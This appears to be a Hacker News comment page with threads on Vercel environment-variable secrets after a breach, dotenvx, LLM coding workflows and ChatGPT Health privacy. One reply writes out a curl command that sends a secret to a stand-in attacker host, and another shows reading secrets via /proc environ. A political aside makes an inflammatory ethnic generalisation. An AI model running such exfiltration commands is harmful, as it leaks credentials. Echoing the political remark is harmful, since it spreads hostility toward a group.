Hacker News | yoaviram's comments

I believe this is inaccurate. Vercel env vars are all encrypted at rest (on their side). The 'sensitive' checkbox means you can't retrieve the value once it's set, which would have saved your ass in this case. Also, annoying to read an article like this without a single link to source material.


They have made an interesting UI decision here. The environment variables list looks like a list of passwords (masked with a view button), and the sensitive flag is obvious in the add blade after you read the advisory, but not before. We are busy rotating secrets because they were not marked as sensitive.


I think it's clear that some customers env vars got exposed, so that can only mean unencrypted, right?


They said "encrypted at rest", which they almost certainly are.

If you spin up an EC2 instance with an ftp server and check the "Encrypt my EBS volume" checkbox, all those files are 'encrypted at rest', but if your ftp password is 'admin/admin', your files will be exposed in plaintext quite quickly.

Vercel's backend is of course able to decrypt them too (or else it couldn't run your app for you), and so the attacker was able to view them, and presumably some other control on the backend made it so the sensitive ones can end up in your app, but can't be seen in whatever employee-only interface the attacker was viewing.


Hmm, that's confusing. So they're eventually encrypted but plain-text at some point? Doesn't sound good TBH.


How do you use them if you don't decrypt them? At some point you have to see them in plaintext. Even if they are sensitive and not shown in the UI you can still start an app and curl https://hacker.example/$my_encrypted_var to exfiltrate them.

What's best practice for handling env vars? How do people handle them "securely" without it just being security theater? What tools and workflows are people using?


Exactly. How do you play back the encrypted DVD without having the decryption key right there on the player for everyone to find?


Keepass has an option to "encrypt in memory" certain passwords and other sensitive information.

The point of encryption is often about which other software or hardware attacks are minimized or eliminated.

However, if someone figures out access to a running system, there's really no way to both allow an app to run and keep everything encrypted. It certainly is possible, like the way keepass encrypts items in memory, but if an attacker has root on a server, they just wait for it to be accessed, if not outright find the key that encrypted it.

This is to say, 99.9% of apps and these platforms aren't secure against this type of low-level intrusion.


Even Keepass's "encrypt in memory" option leaves that encryption key in memory, so it can auto-type or copy passphrases into form fields. It's an extra step, but not unbreakable.


And even then the passphrase is put into form fields in plaintext, so there's *got* to be some sort of attack to grab those. They must be in memory decrypted at some point.

It always comes back round to "you can't have your cake and eat it".


Yeah that's a good point. Dotenvx seems to claim a solution but I'm not smart enough to make sense of it.

However, I do feel now like my sensitive things are better off deployed on a VPS, where someone would need an ssh exploit to come at me.


dotenvx is a way to encrypt your secrets at rest. It's kinda like sops but not as good. https://getsops.io/

Notice how their tutorial says "run 'dotenvx run -- yourapp'". If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext, at runtime, since they're just encrypted at rest.

The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend (the '.env.keys' file by default in dotenvx) used to show them in the frontend and decrypt them for running apps.


> If you did 'dotenvx run -- env', all your secrets would be printed right there in plaintext

Same for sops.

> The equivalent in vercel would be encrypted in the database (the encrypted '.env' file), with a decryption key in the backend

The encrypted .env file is actually committed to source control, and the decryption key is placed in Vercel's environment variables dashboard. The attacker only gained access to the latter here, so if you were using dotenvx they can't get your secrets. Unless they also gained access to the codebase, in which case they have terabytes of data to go through to match up private keys from the database with encrypted .env files from the source code exfiltration - much more effort for attackers.


Creator of dotenvx here.

There is no silver bullet, but Dotenvx splits your secrets into two separate locations.

1. The private decryption key - which lives on Vercel in this example
2. The encrypted .env file - which lives in your source code pushed to Vercel

Attackers only got access to the first (as far as I know from what was reported). So your secrets would be safe in this attack if using Dotenvx. (A private key is useless without its corresponding encrypted .env file. Attackers need both.)
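The "attackers need both halves" property can be illustrated with a toy one-time pad in Python. This is purely an analogy, not Dotenvx's actual cryptography (the whitepaper describes the real scheme):

```python
import secrets

def split_secret(plaintext: bytes):
    """Toy split: neither half alone reveals anything."""
    key = secrets.token_bytes(len(plaintext))                  # analogue of the private key held by Vercel
    ciphertext = bytes(p ^ k for p, k in zip(plaintext, key))  # analogue of the encrypted .env in git
    return key, ciphertext

def recover(key: bytes, ciphertext: bytes) -> bytes:
    return bytes(c ^ k for c, k in zip(ciphertext, key))

key, ct = split_secret(b"DATABASE_URL=postgres://...")
assert recover(key, ct) == b"DATABASE_URL=postgres://..."
# With a one-time pad, an attacker holding only `key` (or only `ct`)
# learns nothing: every plaintext of that length is equally likely.
```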

The whitepaper goes into the problem and solution in more detail: https://dotenvx.com/whitepaper.pdf


If a company says “encrypted at rest” that is generally compliance-speak for “not encrypted, but the hard drive partition is encrypted”.

Various certifications require this, I guess because they were written before hyper scalers and the assumed attack vector was that someone would literally steal a hard drive.

A running machine is not “at rest”, just like you can read files on your encrypted Mac HDD, the running program has decrypted access to the hard drive.


"encrypted at rest" is great to guard against stolen laptops, or, in the server room, against both people breaking in and stealing servers (unlikely at the security level of most hyperscalers, but possible) and, more commonly, broken HDDs being improperly disposed of


How does that translate to VMs? If "encryption at rest" is done at the guest level, instead of (or in addition to) the host, that would be pretty close to minimal "encrypted except when in use" time and would protect against virtual equivalents of pulling a hard drive out of a data center.


Env vars are not secure. Anything that has root access can see all env vars of all applications via /proc.

(And modern Linux is unusable without root access, thanks to Docker and other fast-and-loose approaches.)
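The /proc visibility is easy to demonstrate (Linux only; `DEMO_SECRET` is a made-up variable name):

```python
import subprocess

# Spawn a child with a secret in its environment, then read it straight
# back out of /proc. Anything that can read /proc/<pid>/environ (the same
# user, or root for any pid) sees the value in plaintext.
child = subprocess.Popen(["sleep", "30"], env={"DEMO_SECRET": "hunter2"})
raw = open(f"/proc/{child.pid}/environ", "rb").read()
env = dict(item.split(b"=", 1) for item in raw.split(b"\0") if item)
print(env[b"DEMO_SECRET"])  # b'hunter2'
child.kill()
```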


How often do you log in as root, or use sudo to become root, when you're working with Docker containers?

Because I never do, unless I'm down in the depths of /var/lib/docker doing stuff I shouldn't.


That just means you outsourced the `sudo` invocations to some other person. (Which is even worse.)


No, it means I understand how Unix permissions work.


Glib response, but in reality you basically cannot do anything in a modern Linux system without root except read and write files in your home directory.


There isn't really a way around it.


There is -- you can expose a UNIX socket for serving credentials and allow access to it only from a whitelist of systemd services.


They would still exist in plaintext, just the permissions would make it a little harder to access.


No, UNIX sockets work over SSL too.

You can, theoretically, dig through a system memory dump and try to mine the credentials out of the credential server's heap, but that exploit is exponentially more difficult than a simple `cat /proc/1234/environ`.
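For what it's worth, the "whitelist of callers" check on a UNIX socket is usually built on SO_PEERCRED, which asks the kernel who is on the other end. A minimal Linux-only sketch, using a socketpair so both ends live in this one process:

```python
import os
import socket
import struct

# The server side of a UNIX socket can ask the kernel for the peer's
# (pid, uid, gid). Unlike anything the client sends, this is unforgeable.
server, client = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
creds = server.getsockopt(socket.SOL_SOCKET, socket.SO_PEERCRED,
                          struct.calcsize("3i"))
pid, uid, gid = struct.unpack("3i", creds)

# Toy policy: only hand the secret to processes running as our own uid.
assert uid == os.getuid()
```

A real credential server would accept() connections on a listening socket and apply the same check per client; systemd can additionally restrict which services may reach the socket path at all.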


That works on a single persistent box, but unfortunately, that means giving up on autoscaling, which is not so nice for cloud applications.


You can proxy the UNIX socket to a network server if you want to. You can even use SSL encryption at all times too.


Once it's networked you lose the "whitelist of systemd services" and it's then no different from any networked secret store.


No, this is a solved problem: https://spiffe.io/

You can do service attestation securely, even for networked services.


Nice. Really grateful for your participation in this comment tree

Run your own servers so the .env isn't shared with your hosting provider?


It seems like encrypting and throwing away the key would be the only acceptable strategy.


They need to give your app the environment variables later so they cannot throw away the key.

For non-sensitive environment variables, they also show you the value in the dashboard so you can check and edit them later.

Things like 'NODE_ENV=production' vs 'NODE_ENV=development' are probably something the user wants to see, so that's another argument for letting the backend decrypt and display those values, even ignoring the "running your app" part.

You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.


> You're welcome to add an input that goes straight to '/dev/null' if you want, but it's not exactly a useful feature.

Piping to /dev/null is of course pointless.

What you really want is the /dev/null as a Service Enterprise plan for $500/month with its High Availability devnull Cluster ;)

https://devnull-as-a-service.com/pricing/


Then you might as well write them to /dev/null. Safer, has the same effect, and faster.


"If we bomb them some more, those poor citizens will surely realize that we're on their side"


Honestly, I think we are already past that.

Religious crazies have taken over Israel and they simply don't value the lives of non Jews. They want those poor citizens gone for more Semitic Lebensraum.


Apparently Anthropic downgraded cache TTL to 5 min without telling anyone. My biggest problem with the recent Claude Code issues is the lack of transparency, although it looks like even Boris doesn't know about this one: https://news.ycombinator.com/item?id=47736476


I have a limited company and a nonprofit registered in Estonia and am about to register another company. I can't recommend it enough. It's how it should be everywhere, and the polar opposite of how it is in Italy, where I am based.


I've been using GSD extensively over the past 3 months. I previously used speckit, which I found lacking. GSD consistently gets me 95% of the way there on complex tasks. That's amazing. The last 5% is mostly "manual" testing. We've used GSD to build and launch a SaaS product including an agent-first CMS (whiteboar.it).

It's hard to say why GSD worked so much better for us than other similar frameworks, because the underlying models also improved considerably during the same period. What is clear is that it's a huge productivity boost over vanilla Claude Code.


Same. Have had great results with it. I got sick of paying FreshBooks monthly for basic income/expense tracking for Schedule C reporting and used GSD to build a macOS Swift app with Codex 5.4 and Opus 4.6. It’s working great and I am considering releasing it on the App Store. It started as a web app, but then I wanted screen capture from other windows for receipts in email or whatever. Then I wanted physical receipts, and so used Apple continuity camera. All working now in my app. And, I just added receipt auto-extract to pull salient info from and determine deduction category using Anthropic API.

Yes this is how much paying FreshBooks annoyed me. Plus I hated they forced an emailed 2FA if you didn’t connect with Google.


How feature-complete is it compared to FreshBooks?

Also, what does it cost to run? Like - API costs?

Is it pure Swift? Or Electron app?


Your site whiteboar.it doesn't load properly on visit or on refresh; I had to click one of the footer links for it to somehow load. Terrible first impression. I can email you a video if you want.


Yesterday I wrote a post about exactly this. Software development, as the act of manually producing code, is dying. A new discipline is being born. It is much closer to proper engineering.

Like an engineer overseeing the construction of a bridge, the job is not to lay bricks. It is to ensure the structure does not collapse.

The marginal cost of code is collapsing. That single fact changes everything.

https://nonstructured.com/zen-of-ai-coding/


> wrote

Quite a heavy-lifting word here. You understand why people flagged that post, right? It's painfully non-human. I'm all for utilizing LLMs, but I highly suggest you read Simon's posts. He's obviously a heavy AI user, but even his blog posts aren't that inorganic, and that's why he became the new HN blog babe.

[0]: I personally believe Simon writes with his own voice, but who knows?


How paranoid do you want to get? Simon's written enough, such that you could just feed his blog to AI and ask it to write in his voice. Which, taken to the logical extreme, means that the last time he went to visit OpenAI, he was captured, and locked in a dungeon, and his online presence is now entirely AI with the right prompt. In fact, that's happened to everyone on this site, and we're all LLMs just predicting the next word at each other.

There's no actual way to determine if any words are from a silicon token generator or meat-based generator. It's not AI, it's human! Emdash. You're absolutely right!

system failure.


We have the entire web built on technical debt and LLMs mostly trained on that, what could go wrong? Cost will reside somewhere else if not on code


> It is much closer to proper engineering.

I would not equate software engineering to "proper" engineering insofar as being uttered in the same sentence as mechanical, chemical, or electrical engineering.

The cost of code is collapsing because web development is not broadly rigorous, robust software was never a priority, and everyone knows it. The people complaining that AI isn't good enough yet don't grasp that neither are many who are in the profession currently.


> The people complaining that AI isn't good enough yet don't grasp that neither are many who are in the profession currently.

I think the externalities are being ignored. Having the time and money to train engineers is expensive. Having all of your users' data stolen is a slap on the wrist.

So replacing those bad workers with AI is fine. Unless you remove the incentives to be fast instead of good, then yeah, AI can be good enough for some cases.


Indeed, it's like those complaining self-driving cars occasionally crash when their crash rates are up to 90% less than humans . . .


You didn't write that and you shouldn't believe that you did.


This is such a strange take. Your words remind me of past crypto hype cycles, where people pushed web3.0 and NFT FOMO hysteria.

Engineering is the practical application of science and mathematics to solve problems. It sounds like you're maybe describing construction management instead. I'm not denying that there's value here, but what you're espousing seems divorced from reality. Good luck vibecoding a nontrivial actuarial model, then having it to pass the laundry list of reviews and having large firms actually pick it up.


> This is such a strange take. Your words remind me of past crypto hype cycles, where people pushed web3.0 and NFT FOMO hysteria.

That's a little harsh. I think most everyone would agree we're in a transformative time for engineering. Sure there's hype, but the adoption in our profession (assuming you're an engineer) isn't waning.


It's not pleasant to read this.

    The claim here is profound: comprehension of the codebase at the function level is no longer necessary
It's not profound. It's not profound when I read the exact same awed blog post about how "agentic" is the future and you don't even need to know code anymore.

It wasn't profound the first time, and it's even dumber that people keep repeating it - maybe they take all the time they saved not writing, and use it to not read.


Stop putting forth your AI generated blog posts as your own work.


Agree. This is a transition from being "in" the loop to being "on" the loop.


The formal engineering disciplines are not defined by the construction vs design distinction so much as the regulatory gates they have passed and the ethical burdens they shoulder for society's benefit.

https://www.slater.dev/2025/09/its-time-to-license-software-...


I just finished writing a post about exactly this. Software development, as the act of manually producing code, is dying. A new discipline is being born. It is much closer to proper engineering.

Like an engineer overseeing the construction of a bridge, the job is not to lay bricks. It is to ensure the structure does not collapse.

The marginal cost of code is collapsing. That single fact changes everything.

https://nonstructured.com/zen-of-ai-coding/


> I just finished writing a post about exactly this. Software development, as the act of manually producing code, is dying.

It was never that. Take any textbook on software engineering and the focus was never on the code, but on systems design and correctness. I'm looking at the table of contents of one (Software Engineering by David C. Kung) and these are a few sample chapters:

  ...
  4. Software Requirement Elicitation
  5. Domain Modelling
  6. Architectural Design
  ...  
  8. Actor-System Interaction Modeling
  9. Object Interaction Modeling
  ...
  15. Modeling and Design of Rule-Based Systems
  ...
  19. Software Quality Assurance
  ...
  24. Software Security
What you're talking about was coding, which has never been the bottleneck other than for beginners in some programming languages.


Our CEO, an expert in marketing, has discovered Claude Code, now has the most open PRs of all developers, and is pushing us to « quickly review ». He does not understand why reviews are so slow, because it's « the easiest part ». We live in a new world.


In what world do these new tools help with "laying bricks", but not with ensuring that the structure does not collapse? How is that work any more difficult than producing the software in the first place? It wasn't that long ago that these tools could barely produce a simple program. If you're buying into the promises of this tech, then what's stopping it from also being able to handle those managerial tasks much better than a human?

The seemingly profound points of your marketing slop article ignore that these new tools are not a higher level of abstraction, but a replacement of all cognitive work. The tech is coming for your job just as it is coming for the job of the "bricklayer" you think is now worthless. The work you're enjoying now is just a temporary transition period, not an indication of the future of this industry.

If you enjoy managing a system that hallucinates solutions and disregards every other instruction, that's great. When you reach a dead end with that approach, and the software is exposing customer data, or failing in unpredictable ways, hopefully you know some good "bricklayers" that can help you with that.


Accountability then


Anticipating modes of failure, creating tooling to identify and hedge against risks.


If we could do this it would have been done already. Outsourced devs would be ubiquitous.


This thread reads like an advertisement for ChatGPT Health.

I came to share a blog post I just posted titled: "ChatGPT Health is a Marketplace, Guess Who is the Product?"

OpenAI is building ChatGPT Health as a healthcare marketplace where providers and insurers can reach users with detailed health profiles, powered by a partner whose primary clients are insurance companies. Despite the privacy reassurances, your health data sits outside HIPAA protection, in the hands of a company facing massive financial pressure to monetize everything it can.

https://consciousdigital.org/chatgpt-health-is-a-marketplace...


> This thread reads like an advertisement for ChatGPT Health.

This thread has a theme I see a lot in ChatGPT users: They're highly skeptical of the answers other people get from ChatGPT, but when they use it for themselves they believe the output is correct and helpful.

I've written before on HN about my friend who decided to take his health into his own hands because he trusted ChatGPT more than his doctors. By the end he was on so many supplements and "protocols" that he was doing enormous damage to his liver and immune system.

The more he conversed with ChatGPT, the better he got at getting it to agree with him. When it started to disagree or advise caution, he'd blame it on overly sensitive guardrails, delete the conversation, and start over with an adjusted prompt. He'd repeat this until he had something to copy and paste to us to "prove" that he was on the right track.

As a broader anecdote, I'm seeing "I thought I had ADHD and ChatGPT agrees!" at an alarming rate in a couple communities I'm in with a lot of younger people. This combined with the TikTok trend of diagnosing everything as a symptom of ADHD is becoming really alarming. In some cohorts, it's a rarity for someone to believe they don't have ADHD. There are also a lot of complaints from people who are angry their GP wouldn't just write a prescription for Adderall and tips for doctor shopping around to find doctors who won't ask too many questions before dispensing prescriptions.


> I'm seeing "I thought I had ADHD and ChatGPT agrees!" at an alarming rate in a couple communities I'm in with a lot of younger people

This may be caused by ChatGPT response patterns but doesn't necessarily mean there is an increase of false (self-)diagnoses. The question is: What is alarming about the increasing rate of diagnoses?

There has been an increase of positive diagnoses over the last decades that have been partially attributed to adult diagnoses that weren't common until (after) the 1990s and the fact that non-male patients often remained undiagnosed because of a stereotypical view on ADHD.

If the diagnosis helps, then it's a good thing! If it turns out that 10% of the population are ADHDers, then let's see how we can change our environment to reflect that fact. In many cases, meds aren't needed as much when public spaces provide the necessary facilities to retreat for a few minutes, wear headphones, chew gum or fidget.

The story of your friend sounds very bad and I share your point here, completely. But concerning ADHD, I still don't see what's bad about the current wave of self-diagnoses. If people buy meds illegally, use ChatGPT as a therapist, etc. THAT is a problem. But not identifying with ADHD itself (same for Autism, Depression, Anxiety and so on).

ADHD may even be a reinforcing factor for an LLM user to be convinced by the novelty of the tool - but that would have to be empirically evaluated. If it were so, then this could even contribute to a better rate of diagnoses without ChatGPT capabilities in this field contributing much to the effect. Many ADHDers suffer from failing at certain aspects of daily life over and over, and advice that helps others only makes them feel worse because it doesn't work for them (e.g. building habits or rewarding oneself for reaching a milestone can be much more difficult for ADHDers than non-ADHDers). I'm just guessing here and this doesn't count for all ADHDers, but: whenever a new and possibly fun tool comes along that feels like an improvement, there can be a spark of enthusiasm that may lead to increased trust. This usually decreases after a while, and I guess, given a bit more time of LLMs being around, the popularity in this field may also decrease.


I don't see why they shouldn't be sued for misleading people with such products.


Great write up. I'd even double down on this statement: "You can opt in to chat history privacy". This is really "You can opt in to chat history privacy on a chat-by-chat basis, and there is no way to set a default opt-out for new chats".


This. It’s the same play with their browser. They are building the most comprehensive data profile on their users and people are paying them to do it.


Is this any worse than Google? Seems like the same business model.


There are lots of companies that do this. Doesn't make it right.

The real "evil" here is that companies like Meta, Google, and now OpenAI sell people a product or service that the customer thinks is the full transaction. I search with Google, they show me ads - that's the transaction. I pay for Chatgpt, it helps me understand XYZ - that's the transaction.

But it isn't. You give them your data and they sell it - that's the transaction. And that obscurity is not ethical in my opinion.


> You give them your data and they sell it - that's the transaction

I think that's the wrong framing. Let's get real: They're pimping you out. Google and Meta are population-scale fully-automated digital pimping operations.

They're putting everyone's ass on the RTB street and in return you get this nice handbag--err, email account/YouTube video/Insta feed. They use their bitches' data to run an extremely sophisticated matchmaking service, ensuring the advertiser Johns always get to (mind)fuck the bitches they think are the hottest.

What's even more concerning about OpenAI in particular is they're poised to be the biggest, baddest, most exploitative pimp in world history. Instead of merely making their hoes turn tricks to get access to software and information, they'll charge a premium to Johns to exert an influence on the bitches and groom them to believe whatever the richest John wants.

Goodbye democracy, hello pimp-ocracy. RTB pimping is already a critical national security threat. Now AI grooming is a looming self-governance catastrophe.


I think you just wrote a treatment for the next HBO Max sunday drama


And it's not only your data, that makes it much worse.

"You are the product" is a good catchphrase to make people understand. But actually when you search or interact with LLMs, you provide not only primary data about yourself but also about other people by searching for them in connection with specific search terms, by using these services from your friend's house which connects you to their IP-Address, by uploading photos of other people etc.

"You are the product and you come with batteries (your friends)."


Does Google have your medical records? It doesn't have mine.


They tried to at one point with "google health". They are still somewhat trying to get that information with the fitbit acquisition.


People email about their medical issues and google for medical help using Gmail/Google Search. So yes, Google has people's medical records.


If you hear me talking to someone about needing to pick up some flu medicine after work do you have my medical records?


No, but if I hear you telling someone you have the flu and are picking up flu medicine after work, then I have a portion of your medical records. Why is it hard for people on HN to believe that normal people do not protect their medical data and email about it or search Google for their conditions? People in the "real world" hook up smart TVs to the internet and don't realize they are being tracked. They use cars with smart features that let them be tracked. They have apps on their phone that track their sentiments, purchases, and health issues... All we are seeing here is people getting access to smart technology for their health issues in such a manner that they might lower their healthcare costs. If you are an American you can appreciate ANY effort in that direction.


Maybe stop to consider that knowing a few scattered facts and having your complete medical records are not the same thing, Hemingway.


how do you know they don't?


Since when is Google the model to emulate?


Depends on your goals. If you are starting a business and you see a company surpass the market cap of Apple, again, then you might view their business model as successful. If you are a privacy advocate then you will hate their model.


Well you said "is this any _worse_" (emphasis mine) and I could only assume you meant ethically worse. At which point the answer is kind of obvious because Google hasn't proven to be the most ethical company w.r.t. user data (and lots of other things).


since always


May your piece stay at the highest level of this comment section.


I get that impression too - but also it's HN and enthusiastic early adoption is unsurprising.

My concern, and the reason I would not use it myself, is the all-too-frequent skirting of externalities. For every person who says "I can think for myself and therefore understand if GPT is lying to me," there are ten others who will take it as gospel.

The worry I have isn't that people are misled - this happens all the time especially in alternative and contrarian circles (anti-vaxx, homeopathy, etc.) - it's the impact it has on medical professionals who are already overworked who will have to deal with people's commitment to an LLM-based diagnosis.

The patient who blindly trusts what GPT says is going to be the patient who argues tooth and nail with their doctor about GPT being an expert, because they're not power users who understand the technical underpinnings of an LLM.

Of course, my angle completely ignores the disruption angle - tech and insurance working hand in hand to undercut regulation, before it eventually pulls the rug.


Sharing my experience with SpecKit in case anyone finds it useful.

I've been using Speckit for the last two weeks with Claude Code, on two different projects. Both are new code bases. It's just me coding on these projects, so I don't mind experimenting.

The first one was just speckit doing its thing. It took about 10 days to complete all the tasks and call the job done. When it finished, there was still a huge gap. Most tests were failing, and the build was not successful. I had to spend an equally long, excruciating time guiding it on how to fix the tests. This was a terrible experience, and my confidence in the code is low because Claude kept rewriting and patching it with many fixes to one thing, breaking another.

For the second project, I wanted to iterate in smaller chunks. So after SpecKit finished its planning, I added a few slash commands of my own. 1) generate a backlog.md file based on tasks.md so that I don't mess with SpecKit internals. 2) plan-sprint to generate a sprint file with a sprint goal and selected tasks with more detail. 3) implement-sprint broadly based on the implement command.

This setup failed as the implement-sprint command did not follow the process despite several revisions. After implementing some tasks, it would forget to create or run tests, or even implement a task.

I then modified the setup and created a subagent to handle task-specific coding. This is easy, as all the context is stored in SpecKit files. The implement-sprint functions as an orchestrator. This is much more manageable because I get to review each sprint rather than the whole project. There are still many cases where it declares the sprint as done even though tests still fail. But it's much easier to fix, and my level of trust in the code is significantly higher.

My hypothesis now is that Claude is bad at TDD. It almost always has to go back and fix the tests, not the implementation. My next experiment is going to be to create the tests after the implementation. This is not ideal, but at this point, I'd rather gain velocity, since otherwise it would be faster for me to code it myself.


Essentially what this article is asking for, in most cases, is a better UI/UX for one of the foundation models.

